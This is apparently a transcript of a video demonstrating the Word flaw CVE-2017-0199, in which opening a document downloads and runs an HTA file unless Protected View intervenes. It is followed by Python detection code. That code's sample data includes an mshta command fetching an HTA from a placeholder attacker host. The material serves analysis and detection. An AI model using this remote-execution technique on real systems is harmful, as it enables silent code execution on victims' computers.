Hello, I'm going to demonstrate CVE-2017-0199. The malicious file has been created with Metasploit, so I have two versions here, test and test mark-of-the-web, and I have Process Explorer, Wireshark and Process Monitor running. Let's start Process Monitor like this. Now I'm opening this file. It worked: Word is up here, you get this message, but if you look beneath here, you have this message box, "hello from HTA". This is the HTML application that has been downloaded and executed without me clicking anything, just opening the document.

If we look into Wireshark here and we filter for frames that contain "DDA", you can see a request to ddstames.com and then an HTTP request for test.hta on my website, and if we follow the HTTP stream, you can see here the test request and here the reply with a content type of application/hta, and here the HTML application, very simple, it just displays a message box.

If we look into Process Explorer, we have winword, no child processes, but if we have a look here, here we have the HTML application engine that was started. We can see that in Process Monitor: if we look at the process tree, here you can see that we started Word by opening the document, and here you can see that MSHTA was launched to launch the HTA file that was downloaded from my site. I'm going to click here, then I get the HTA application, no, that's another message you get, and then we close, we don't save.

So that was a file generated with Metasploit. I have the same file here generated with Metasploit, but I also put a mark of the web on it. You see here: "This file came from another computer and might be blocked to help protect this computer." So this file has a mark of the web, as it would if it were, for example, downloaded with Internet Explorer or saved with Outlook.
So let's restart this Wireshark capture and also Process Monitor, and now we open this. Now, because it has a mark of the web, we are in Protected View, and you will see, so let's filter this like this, you see there are no requests here, no HTTP requests to download from my site, and also if we look into the process tree, the MSHTA application has not been launched. Word is launched, and this is the sandbox.

Let's start again. Let's clear this, and now we are going to say Enable Editing, so leave the Protected View mode, leave the sandbox, and then you can see that the HTA was executed again. So let's close all this. The file here actually was not downloaded again because it's already present; it was already downloaded once on my machine. And if we go into the process tree, you can see here the HTA that was launched.
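Detection logic for the three observations in this demonstration, as an added example that is not part of the original video: it flags Office processes spawning mshta.exe (the Process Monitor process-tree signal), HTTP responses served as application/hta (the Wireshark signal), and reads the Zone.Identifier stream that carries the mark of the web. All events, responses and the attacker host name below are constructed sample data.

```python
"""Detection over constructed process, HTTP and Zone.Identifier data (not from the demo)."""
from dataclasses import dataclass

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"mshta.exe"}

@dataclass
class ProcEvent:
    parent_image: str   # full path of the parent process
    image: str          # full path of the created process
    command_line: str

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def office_spawned_script_hosts(events):
    """Events where an Office process launched a script host such as mshta.exe.
    In the demo Word normally has no child processes, so this parent/child pair
    is the process-tree signal that an HTA was handed off for execution."""
    return [e for e in events
            if basename(e.parent_image) in OFFICE_PARENTS
            and basename(e.image) in SCRIPT_HOSTS]

def hta_responses(responses):
    """Indexes of raw HTTP responses whose Content-Type is application/hta."""
    hits = []
    for i, raw in enumerate(responses):
        headers = raw.split("\r\n\r\n", 1)[0].lower()
        for line in headers.split("\r\n"):
            if line.startswith("content-type:") and "application/hta" in line:
                hits.append(i)
    return hits

def has_mark_of_the_web(zone_identifier):
    """True if a Zone.Identifier stream marks the file as Internet (3) or
    Restricted (4) zone, which is what puts Word into Protected View.
    None means the file has no stream, like the first file in the demo."""
    if zone_identifier is None:
        return False
    for line in zone_identifier.splitlines():
        key, _, value = line.partition("=")
        if key.strip().lower() == "zoneid":
            return value.strip() in {"3", "4"}
    return False

# Constructed sample data, modelled on what the demo shows (placeholder host).
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Program Files\Microsoft Office\WINWORD.EXE", "WINWORD.EXE /n test.docx"),
    ProcEvent(r"C:\Program Files\Microsoft Office\WINWORD.EXE", r"C:\Windows\System32\mshta.exe", "mshta.exe http://ATTACKER-SITE-PLACEHOLDER/test.hta"),
]
SAMPLE_RESPONSES = [
    "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html></html>",
    "HTTP/1.1 200 OK\r\nContent-Type: application/hta\r\n\r\n<script>alert('hello from HTA')</script>",
]
SAMPLE_ZONE = "[ZoneTransfer]\r\nZoneId=3\r\n"
```

Note that the process-tree check also fires after Enable Editing, which matches the demo: leaving Protected View removes the sandbox, not the mark of the web itself.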